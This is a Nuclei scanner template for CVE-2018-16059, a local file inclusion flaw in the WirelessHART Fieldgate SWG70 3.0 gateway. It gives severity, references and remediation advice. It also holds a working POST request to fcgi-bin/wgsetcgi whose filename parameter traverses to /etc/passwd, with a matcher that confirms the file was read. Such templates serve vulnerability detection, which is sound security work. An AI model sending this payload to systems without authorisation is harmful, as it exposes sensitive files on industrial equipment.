nuclei-templates/http/cves/2018/CVE-2018-16059.yaml

49 lines
1.9 KiB
YAML

id: CVE-2018-16059
info:
name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion
author: daffainfo
severity: medium
description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system, potentially leading to unauthorized access or information disclosure.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0.
reference:
- https://www.exploit-db.com/exploits/45342
- https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342/
- https://cert.vde.com/en-us/advisories/vde-2019-002
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2018-16059
cwe-id: CWE-22
epss-score: 0.32871
epss-percentile: 0.96924
cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: endress
product: wirelesshart_fieldgate_swg70_firmware
tags: cve,cve2018,iot,lfi,edb,endress
http:
- method: POST
path:
- "{{BaseURL}}/fcgi-bin/wgsetcgi"
body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a004630440220796e5a1f1956c4523eb569daf5b1a0a1faebc2f72247418812931a5e68277d980220772cd55cfb046e365847adba5643a19a0e9462d49ac46b936262e094587b2f92:922c64590222798bb761d5b6d8e72950